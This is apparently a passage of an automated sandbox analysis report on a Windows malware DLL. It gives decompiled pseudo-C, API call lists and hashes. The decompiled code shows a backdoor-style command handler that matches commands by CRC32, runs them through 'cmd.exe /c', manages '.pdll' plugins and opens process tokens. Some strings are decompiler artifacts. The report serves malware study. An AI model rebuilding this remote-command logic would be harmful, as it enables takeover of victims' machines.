                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											_t296 =  *0x6f340000; // 0x3c
                                                                                                                        											_t470 = SetTimer(_t370, _t370, _t296 * 0x3e8, _t370);
                                                                                                                        											goto L87;
                                                                                                                        										} else {
                                                                                                                        											goto L77;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								_t493 = 0;
                                                                                                                        								if(_v2068 <= _t370) {
                                                                                                                        									goto L54;
                                                                                                                        								}
                                                                                                                        								_v2072 = 0xfff - _t473;
                                                                                                                        								_t478 = _t473 + _t481;
                                                                                                                        								L42:
                                                                                                                        								if(_t493 > 0) {
                                                                                                                        									Sleep(0x1f4);
                                                                                                                        								}
                                                                                                                        								_t407 =  *0x6f340398; // 0x0
                                                                                                                        								_t373 = GetDlgItemTextA(_t407, 0x4e82, _t478, _v2072);
                                                                                                                        								if( *_t481 == 0x2d || _t373 < 0xb) {
                                                                                                                        									goto L46;
                                                                                                                        								}
                                                                                                                        								_t494 = 0;
                                                                                                                        								if(_t373 <= 0) {
                                                                                                                        									L52:
                                                                                                                        									_t281 = _t373;
                                                                                                                        									_v2096 = _t281;
                                                                                                                        									L53:
                                                                                                                        									_t473 = _v2092;
                                                                                                                        									_t370 = 0;
                                                                                                                        									goto L54;
                                                                                                                        								} else {
                                                                                                                        									goto L49;
                                                                                                                        								}
                                                                                                                        								do {
                                                                                                                        									L49:
                                                                                                                        									if(StrTrimA( &(_t478[_t494]), " ") != 0) {
                                                                                                                        										_t373 = _t373 - 1;
                                                                                                                        									}
                                                                                                                        									_t494 =  &_v3;
                                                                                                                        								} while (_t494 < _t373);
                                                                                                                        								goto L52;
                                                                                                                        								L46:
                                                                                                                        								_t281 = 0;
                                                                                                                        								_t493 =  &_v3;
                                                                                                                        								_v2096 = 0;
                                                                                                                        								 *_t478 = 0;
                                                                                                                        								if(_t493 < _v2068) {
                                                                                                                        									goto L42;
                                                                                                                        								}
                                                                                                                        								goto L53;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t523 = _t383 - 0x83fe;
                                                                                                                        						goto L24;
                                                                                                                        						L89:
                                                                                                                        						KillTimer(_t370, _t470);
                                                                                                                        						goto L90;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}





































































































































                                                                                                                        0x6f337367
                                                                                                                        0x6f33736b
                                                                                                                        0x6f337376
                                                                                                                        0x6f337378
                                                                                                                        0x6f337386
                                                                                                                        0x6f337390
                                                                                                                        0x6f337396
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373a3
                                                                                                                        0x6f3373a5
                                                                                                                        0x6f3373a9
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373bb
                                                                                                                        0x6f3373bf
                                                                                                                        0x6f3373c6
                                                                                                                        0x6f3373ca
                                                                                                                        0x6f3373ce
                                                                                                                        0x6f3373d2
                                                                                                                        0x6f3373d6
                                                                                                                        0x6f3373d9
                                                                                                                        0x6f3373dc
                                                                                                                        0x6f337412
                                                                                                                        0x6f337412
                                                                                                                        0x6f337416
                                                                                                                        0x00000000
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373e7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3373ec
                                                                                                                        0x6f3373f2
                                                                                                                        0x6f3373f8
                                                                                                                        0x6f3373ff
                                                                                                                        0x6f337409
                                                                                                                        0x6f33740d
                                                                                                                        0x6f337419
                                                                                                                        0x6f33741d
                                                                                                                        0x6f337422
                                                                                                                        0x6f337423
                                                                                                                        0x6f337427
                                                                                                                        0x6f337434
                                                                                                                        0x6f33743b
                                                                                                                        0x6f33743f
                                                                                                                        0x6f337441
                                                                                                                        0x6f337448
                                                                                                                        0x6f337450
                                                                                                                        0x6f337453
                                                                                                                        0x6f337461
                                                                                                                        0x6f337466
                                                                                                                        0x6f33746d
                                                                                                                        0x6f337470
                                                                                                                        0x6f337474
                                                                                                                        0x6f33747a
                                                                                                                        0x6f337487
                                                                                                                        0x6f337491
                                                                                                                        0x6f337496
                                                                                                                        0x6f337496
                                                                                                                        0x6f33749d
                                                                                                                        0x6f3374a2
                                                                                                                        0x6f3374a3
                                                                                                                        0x6f3374ac
                                                                                                                        0x6f3374ae
                                                                                                                        0x6f3374b7
                                                                                                                        0x6f3374bc
                                                                                                                        0x6f3374c6
                                                                                                                        0x6f3374d3
                                                                                                                        0x6f3374d3
                                                                                                                        0x6f3374d9
                                                                                                                        0x6f3374df
                                                                                                                        0x6f33763f
                                                                                                                        0x6f33763f
                                                                                                                        0x6f337648
                                                                                                                        0x6f337649
                                                                                                                        0x6f337656
                                                                                                                        0x6f33766e
                                                                                                                        0x6f337678
                                                                                                                        0x6f33767c
                                                                                                                        0x6f337680
                                                                                                                        0x6f337685
                                                                                                                        0x6f33768b
                                                                                                                        0x6f337698
                                                                                                                        0x6f33769f
                                                                                                                        0x6f3376a4
                                                                                                                        0x6f3376ac
                                                                                                                        0x6f337706
                                                                                                                        0x6f33770a
                                                                                                                        0x6f33770f
                                                                                                                        0x6f33770f
                                                                                                                        0x6f3376ae
                                                                                                                        0x6f3376ae
                                                                                                                        0x6f3376b4
                                                                                                                        0x6f3376b7
                                                                                                                        0x6f3376b9
                                                                                                                        0x6f3376b9
                                                                                                                        0x6f3376d6
                                                                                                                        0x6f3376dc
                                                                                                                        0x6f3376e2
                                                                                                                        0x6f3376e6
                                                                                                                        0x6f3376fa
                                                                                                                        0x6f3376fa
                                                                                                                        0x00000000
                                                                                                                        0x6f3374e5
                                                                                                                        0x6f3374e8
                                                                                                                        0x6f3374fd
                                                                                                                        0x6f337502
                                                                                                                        0x6f337507
                                                                                                                        0x6f33750e
                                                                                                                        0x6f337517
                                                                                                                        0x6f33751d
                                                                                                                        0x6f337522
                                                                                                                        0x6f337530
                                                                                                                        0x6f337538
                                                                                                                        0x6f33753f
                                                                                                                        0x6f337544
                                                                                                                        0x6f33754a
                                                                                                                        0x6f33754e
                                                                                                                        0x6f337556
                                                                                                                        0x6f337558
                                                                                                                        0x6f337558
                                                                                                                        0x6f337562
                                                                                                                        0x6f337569
                                                                                                                        0x6f337589
                                                                                                                        0x6f33758a
                                                                                                                        0x6f33758b
                                                                                                                        0x6f33758c
                                                                                                                        0x6f33756b
                                                                                                                        0x6f337573
                                                                                                                        0x6f337576
                                                                                                                        0x6f33757d
                                                                                                                        0x6f337582
                                                                                                                        0x6f337586
                                                                                                                        0x6f337586
                                                                                                                        0x6f33758d
                                                                                                                        0x6f337592
                                                                                                                        0x6f337599
                                                                                                                        0x6f3375bd
                                                                                                                        0x6f3375cd
                                                                                                                        0x6f3375d7
                                                                                                                        0x6f3375dc
                                                                                                                        0x6f3375e1
                                                                                                                        0x6f3375e7
                                                                                                                        0x6f3375f1
                                                                                                                        0x6f33760c
                                                                                                                        0x6f337617
                                                                                                                        0x6f33761d
                                                                                                                        0x6f33761d
                                                                                                                        0x6f337599
                                                                                                                        0x6f337517
                                                                                                                        0x6f33762f
                                                                                                                        0x6f337639
                                                                                                                        0x6f337712
                                                                                                                        0x6f337712
                                                                                                                        0x6f337718
                                                                                                                        0x6f33771a
                                                                                                                        0x6f33771e
                                                                                                                        0x6f337721
                                                                                                                        0x6f337721
                                                                                                                        0x6f33771e
                                                                                                                        0x6f337727
                                                                                                                        0x6f33773c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337639
                                                                                                                        0x6f3374df
                                                                                                                        0x6f3372de
                                                                                                                        0x6f3372de
                                                                                                                        0x6f3372e4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3372f1
                                                                                                                        0x6f3372f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3372f7
                                                                                                                        0x6f3372f9
                                                                                                                        0x6f337300
                                                                                                                        0x6f337300
                                                                                                                        0x6f33730a
                                                                                                                        0x6f337321
                                                                                                                        0x6f337323
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33733c
                                                                                                                        0x6f337340
                                                                                                                        0x6f33735b
                                                                                                                        0x6f33735b
                                                                                                                        0x6f33735d
                                                                                                                        0x6f337361
                                                                                                                        0x6f337361
                                                                                                                        0x6f337365
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337342
                                                                                                                        0x6f337342
                                                                                                                        0x6f337353
                                                                                                                        0x6f337355
                                                                                                                        0x6f337355
                                                                                                                        0x6f337356
                                                                                                                        0x6f337357
                                                                                                                        0x00000000
                                                                                                                        0x6f33732a
                                                                                                                        0x6f33732a
                                                                                                                        0x6f33732c
                                                                                                                        0x6f33732d
                                                                                                                        0x6f337331
                                                                                                                        0x6f337338
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33733a
                                                                                                                        0x6f3372d8
                                                                                                                        0x6f33705b
                                                                                                                        0x00000000
                                                                                                                        0x6f337767
                                                                                                                        0x6f337769
                                                                                                                        0x00000000
                                                                                                                        0x6f337769
                                                                                                                        0x6f337002

APIs
• RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D67
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004,?,00000014), ref: 6F336D7B
• RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D95
• GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 6F336DAB
• CharLowerW.USER32(?), ref: 6F336DB9
• RtlZeroMemory.NTDLL(6F3403A0,0000009C), ref: 6F336DC9
• RtlGetNtVersionNumbers.NTDLL ref: 6F336DF3
• RtlZeroMemory.NTDLL(00000000,00000034), ref: 6F336E8A
• RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 6F336F29
• GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 6F336F30
• HeapFree.KERNEL32(00000000), ref: 6F336F37
• RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 6F336F6C
• GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 6F336F73
• HeapFree.KERNEL32(00000000), ref: 6F336F7A
• RtlMoveMemory.NTDLL(?,00000000,?), ref: 6F336FB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 6F336FBA
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 6F336FC1
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6F331E48
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 6F336FD7
                                                                                                                        • GetMessageA.USER32 ref: 6F336FFA
                                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 6F33707F
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 6F3370B6
                                                                                                                        • wsprintfW.USER32 ref: 6F3370D9
                                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 6F337103
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F337131
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 6F337138
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6F33713F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$Heap$Zero$FreeMoveProcess$Timer$AllocCharComputeCrc32InfoKillLocaleLowerMessageNumbersPrivateProfileStringVersionVirtuallstrlenwsprintf
                                                                                                                        • String ID: %lu$%s\%s$($PWD$gd$gd
                                                                                                                        • API String ID: 2388189746-3190195910
                                                                                                                        • Opcode ID: 80f712e55549b22a6bc847b499d5d2cd2fae28a9d17684c2f04df2f84591e558
                                                                                                                        • Instruction ID: 3f8193a05892ecb1d658e38f96214ad2619d243b80bf7ca49f5b8d62d593e374
                                                                                                                        • Opcode Fuzzy Hash: 80f712e55549b22a6bc847b499d5d2cd2fae28a9d17684c2f04df2f84591e558
                                                                                                                        • Instruction Fuzzy Hash: 16529DB2908385AFD720DF64C884EABBBEDFB89714F00891DF58587241D775E858CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F335B40() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __ebp;
                                                                                                                        				void* _t91;
                                                                                                                        				void* _t95;
                                                                                                                        				char _t106;
                                                                                                                        				char _t109;
                                                                                                                        				int _t115;
                                                                                                                        				char* _t133;
                                                                                                                        				char _t136;
                                                                                                                        				int _t150;
                                                                                                                        				WCHAR* _t152;
                                                                                                                        				int _t153;
                                                                                                                        				int _t154;
                                                                                                                        				int _t155;
                                                                                                                        				char* _t156;
                                                                                                                        				long _t159;
                                                                                                                        				char* _t163;
                                                                                                                        				int _t168;
                                                                                                                        				int _t169;
                                                                                                                        				long _t174;
                                                                                                                        				char _t175;
                                                                                                                        				long _t177;
                                                                                                                        				int _t180;
                                                                                                                        				int _t185;
                                                                                                                        				char _t186;
                                                                                                                        				int _t193;
                                                                                                                        				struct HWND__* _t197;
                                                                                                                        				intOrPtr* _t202;
                                                                                                                        				int _t203;
                                                                                                                        				int _t204;
                                                                                                                        				char* _t206;
                                                                                                                        				void* _t209;
                                                                                                                        				void* _t213;
                                                                                                                        				char _t218;
                                                                                                                        				char _t219;
                                                                                                                        				char _t223;
                                                                                                                        				char _t226;
                                                                                                                        				CHAR* _t227;
                                                                                                                        				struct HWND__* _t232;
                                                                                                                        				intOrPtr _t233;
                                                                                                                        				int _t234;
                                                                                                                        				char _t238;
                                                                                                                        				char _t254;
                                                                                                                        				CHAR* _t256;
                                                                                                                        				CHAR* _t257;
                                                                                                                        				struct HWND__* _t258;
                                                                                                                        				intOrPtr _t259;
                                                                                                                        				long _t262;
                                                                                                                        				long _t264;
                                                                                                                        				int _t265;
                                                                                                                        				signed int _t271;
                                                                                                                        				int _t276;
                                                                                                                        				int _t279;
                                                                                                                        				void* _t280;
                                                                                                                        				int _t281;
                                                                                                                        				void* _t282;
                                                                                                                        				void* _t283;
                                                                                                                        				void* _t285;
                                                                                                                        				void* _t287;
                                                                                                                        				void* _t291;
                                                                                                                        				void* _t298;
                                                                                                                        				void* _t299;
                                                                                                                        
                                                                                                                        				_t209 =  *(_t282 + 0x130);
                                                                                                                        				 *(_t282 + 0x1c) = 0;
                                                                                                                        				_t280 = E6F33A3D0( *(_t209 + 0xc), _t282 + 0x14);
                                                                                                                        				_t283 = _t282 + 8;
                                                                                                                        				 *(_t283 + 0x10) = _t280;
                                                                                                                        				if(_t280 == 0) {
                                                                                                                        					L133:
                                                                                                                        					_t91 =  *_t209;
                                                                                                                        					if(_t91 != 0) {
                                                                                                                        						WaitForSingleObject(_t91, 0xffffffff);
                                                                                                                        						CloseHandle( *_t209);
                                                                                                                        					}
                                                                                                                        					HeapFree(GetProcessHeap(), 0,  *(_t209 + 0xc));
                                                                                                                        					_t95 =  *(_t209 + 0x14);
                                                                                                                        					if(_t95 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t95);
                                                                                                                        					}
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t209);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				if( *((intOrPtr*)(_t283 + 0x14)) <= 0) {
                                                                                                                        					L132:
                                                                                                                        					LocalFree(_t280);
                                                                                                                        					goto L133;
                                                                                                                        				}
                                                                                                                        				CharLowerA( *_t280);
                                                                                                                        				_t106 =  *( *_t280);
                                                                                                                        				if(_t106 < 0x61 || _t106 > 0x7a) {
                                                                                                                        					if(_t106 != 0x21) {
                                                                                                                        						E6F335AF0(_t209, 4, 0, 0);
                                                                                                                        						goto L132;
                                                                                                                        					}
                                                                                                                        					goto L5;
                                                                                                                        				} else {
                                                                                                                        					L5:
                                                                                                                        					_t109 = HeapAlloc(GetProcessHeap(), 8, 0x400);
                                                                                                                        					 *(_t283 + 0x18) = _t109;
                                                                                                                        					if(_t109 == 0) {
                                                                                                                        						goto L132;
                                                                                                                        					}
                                                                                                                        					_t262 = lstrlenA( *_t280);
                                                                                                                        					_t271 = RtlComputeCrc32(0,  *_t280, _t262) ^ 0x00435a88;
                                                                                                                        					_t298 = _t271 - 0x539b9257;
                                                                                                                        					if(_t298 > 0) {
                                                                                                                        						__eflags = _t271 - 0xcd8eabe7;
                                                                                                                        						if(__eflags > 0) {
                                                                                                                        							__eflags = _t271 - 0xe7ba788f;
                                                                                                                        							if(__eflags > 0) {
                                                                                                                        								__eflags = _t271 - 0xf06cffa0;
                                                                                                                        								if(_t271 == 0xf06cffa0) {
                                                                                                                        									L13:
                                                                                                                        									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
                                                                                                                        										wsprintfA( *(_t283 + 0x18), "/c %s",  *(_t209 + 0xc) + _t262 + 1);
                                                                                                                        										_t285 = _t283 + 0xc;
                                                                                                                        										__eflags = _t271 - 0x876bcf36;
                                                                                                                        										if(_t271 == 0x876bcf36) {
                                                                                                                        											L124:
                                                                                                                        											_t213 = 0x384;
                                                                                                                        											L125:
                                                                                                                        											__eflags = _t271 - 0x2f1f4648;
                                                                                                                        											if(_t271 == 0x2f1f4648) {
                                                                                                                        												L128:
                                                                                                                        												_t115 = 0;
                                                                                                                        												__eflags = 0;
                                                                                                                        												L129:
                                                                                                                        												_push(0);
                                                                                                                        												_push(_t213);
                                                                                                                        												_push(_t115);
                                                                                                                        												E6F335AF0(_t209, E6F334230(0, "cmd.exe",  *((intOrPtr*)(_t285 + 0x24))), 0, 0);
                                                                                                                        												_t283 = _t285 + 0x28;
                                                                                                                        												goto L130;
                                                                                                                        											}
                                                                                                                        											__eflags = _t271 - 0x876bcf36;
                                                                                                                        											if(_t271 == 0x876bcf36) {
                                                                                                                        												goto L128;
                                                                                                                        											}
                                                                                                                        											_t115 = 1;
                                                                                                                        											goto L129;
                                                                                                                        										}
                                                                                                                        										__eflags = _t271 - 0x4779d712;
                                                                                                                        										if(_t271 == 0x4779d712) {
                                                                                                                        											goto L124;
                                                                                                                        										}
                                                                                                                        										__eflags = _t271 - 0x2965d6c5;
                                                                                                                        										if(_t271 == 0x2965d6c5) {
                                                                                                                        											goto L124;
                                                                                                                        										}
                                                                                                                        										_t213 = 0;
                                                                                                                        										goto L125;
                                                                                                                        									} else {
                                                                                                                        										E6F335AF0(_t209, 2, 0, 0);
                                                                                                                        										_t283 = _t283 + 0x10;
                                                                                                                        										L130:
                                                                                                                        										HeapFree(GetProcessHeap(), 0,  *(_t283 + 0x18));
                                                                                                                        										goto L132;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								__eflags = _t271 - 0xf4d35c00;
                                                                                                                        								if(_t271 == 0xf4d35c00) {
                                                                                                                        									_push(0);
                                                                                                                        									_push(0);
                                                                                                                        									_push(0x65);
                                                                                                                        									L84:
                                                                                                                        									_push(E6F335190());
                                                                                                                        									_push(_t209);
                                                                                                                        									E6F335AF0();
                                                                                                                        									_t283 = _t283 + 0x14;
                                                                                                                        									goto L130;
                                                                                                                        								}
                                                                                                                        								__eflags = _t271 - 0xf7013bb9;
                                                                                                                        								if(_t271 == 0xf7013bb9) {
                                                                                                                        									__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
                                                                                                                        									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
                                                                                                                        										_t238 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        										wsprintfA( *(_t283 + 0x18), "\"%s%s\" /c %s", _t238, "cmd.exe",  *(_t209 + 0xc) + _t262 + 1);
                                                                                                                        										_push(_t283 + 0x24);
                                                                                                                        										_push(0x384);
                                                                                                                        										 *(_t283 + 0x30) = 0;
                                                                                                                        										__eflags = E6F332ED0( *(_t283 + 0x18));
                                                                                                                        										E6F335AF0(_t209, 0 | E6F332ED0( *(_t283 + 0x18)) != 0x00000000, _t127,  *(_t283 + 0x30));
                                                                                                                        										_t283 = _t283 + 0x30;
                                                                                                                        										goto L130;
                                                                                                                        									}
                                                                                                                        									L117:
                                                                                                                        									E6F335AF0(_t209, 2, 0, 0);
                                                                                                                        									_t283 = _t283 + 0x10;
                                                                                                                        									goto L130;
                                                                                                                        								}
                                                                                                                        								L115:
                                                                                                                        								E6F335AF0(_t209, 4, 0, 0);
                                                                                                                        								_t283 = _t283 + 0x10;
                                                                                                                        								goto L130;
                                                                                                                        							}
                                                                                                                        							if(__eflags == 0) {
                                                                                                                        								L107:
                                                                                                                        								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
                                                                                                                        								if( *((intOrPtr*)(_t283 + 0x14)) <= 1) {
                                                                                                                        									L111:
                                                                                                                        									E6F335060(5, 0, 0);
                                                                                                                        									_t283 = _t283 + 0xc;
                                                                                                                        									goto L130;
                                                                                                                        								}
                                                                                                                        								_t133 =  *((intOrPtr*)(_t280 + 4));
                                                                                                                        								__eflags =  *_t133 - 0x67;
                                                                                                                        								if( *_t133 != 0x67) {
                                                                                                                        									goto L111;
                                                                                                                        								}
                                                                                                                        								__eflags =  *((char*)(_t133 + 1));
                                                                                                                        								if( *((char*)(_t133 + 1)) != 0) {
                                                                                                                        									goto L111;
                                                                                                                        								}
                                                                                                                        								E6F335060(5, 1, 0);
                                                                                                                        								_t283 = _t283 + 0xc;
                                                                                                                        								goto L130;
                                                                                                                        							}
                                                                                                                        							__eflags = _t271 - 0xd4c57ba8;
                                                                                                                        							if(_t271 == 0xd4c57ba8) {
                                                                                                                        								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
                                                                                                                        								_push(".pdll");
                                                                                                                        								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
                                                                                                                        									_t136 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        									_push( *((intOrPtr*)(_t280 + 4)));
                                                                                                                        									_push(_t136);
                                                                                                                        									wsprintfA(_t283 + 0x3c, "%s%s%s");
                                                                                                                        									_t287 = _t283 + 0x14;
                                                                                                                        									E6F335AF0(_t209, DeleteFileA(_t287 + 0x30), 0, 0);
                                                                                                                        									_t283 = _t287 + 0x10;
                                                                                                                        								} else {
                                                                                                                        									_t218 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        									_push(_t218);
                                                                                                                        									E6F335AF0(_t209, E6F332DF0(), 0, 0);
                                                                                                                        									_t283 = _t283 + 0x18;
                                                                                                                        								}
                                                                                                                        								goto L130;
                                                                                                                        							}
                                                                                                                        							__eflags = _t271 - 0xdf32d24a;
                                                                                                                        							if(_t271 == 0xdf32d24a) {
                                                                                                                        								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
                                                                                                                        								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
                                                                                                                        									_t219 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        									wsprintfA(_t283 + 0x3c, "%s%s%s", _t219,  *((intOrPtr*)(_t280 + 4)), ".pdll");
                                                                                                                        									E6F335AF0(_t209, E6F332750(_t283 + 0x44), 0, 0);
                                                                                                                        									_t283 = _t283 + 0x28;
                                                                                                                        								} else {
                                                                                                                        									_push(0);
                                                                                                                        									E6F3328B0(".pdll");
                                                                                                                        									E6F335AF0(_t209, 1, 0, 0);
                                                                                                                        									_t283 = _t283 + 0x18;
                                                                                                                        								}
                                                                                                                        								goto L130;
                                                                                                                        							}
                                                                                                                        							__eflags = _t271 - 0xe6f1017f;
                                                                                                                        							if(_t271 != 0xe6f1017f) {
                                                                                                                        								goto L115;
                                                                                                                        							}
                                                                                                                        							L90:
                                                                                                                        							_t150 = OpenProcessToken(0xffffffff, 0x28, _t283 + 0x10);
                                                                                                                        							__eflags = _t150;
                                                                                                                        							if(_t150 == 0) {
                                                                                                                        								L98:
                                                                                                                        								E6F335AF0(_t209, 0, 0, 0);
                                                                                                                        								_t283 = _t283 + 0x10;
                                                                                                                        								goto L130;
                                                                                                                        							}
                                                                                                                        							_t152 = M6F340568; // 0x74cec0
